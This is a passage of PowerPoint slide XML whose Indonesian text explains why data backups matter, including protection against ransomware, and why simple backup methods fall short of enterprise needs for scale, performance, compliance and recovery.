              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>salinan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyimpannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpisah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merupakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kegagalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerusakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> ransomware. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Menguji</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memverifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teratur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keandalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemulihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Dalam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sederhana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cukup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengatasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tantangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>persyaratan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>unik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Skalabilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perhatian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sejumlah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efisien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Metode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sederhana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sulit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengakomodasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pertumbuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ukuran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kompleksitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kinerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebabkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sederhana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengganggu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memperlambat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berjalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemulihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang lama. Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menuntut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perincian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyesuaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menargetkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, database, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> subset data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sederhana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Persyaratan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepatuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memerlukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fitur-fitur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>canggih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jejak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> audit yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dimiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pendekatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sederhana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rencana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemulihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bencana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpusat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merupakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> strategi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Teknik </a:t>
            </a:r>
            <a:r>
